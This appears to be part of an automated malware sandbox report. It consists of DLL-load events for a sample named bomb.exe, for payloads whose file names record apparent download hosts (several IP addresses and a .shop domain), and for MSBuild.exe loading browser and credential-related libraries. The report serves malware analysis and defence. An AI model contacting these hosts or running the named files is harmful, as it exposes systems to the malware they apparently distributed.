Source: C:\Users\user\Desktop\bomb.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: propsys.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: riched20.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: usp10.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: msls31.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: edputil.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: netutils.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: slc.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: userenv.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: sppc.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
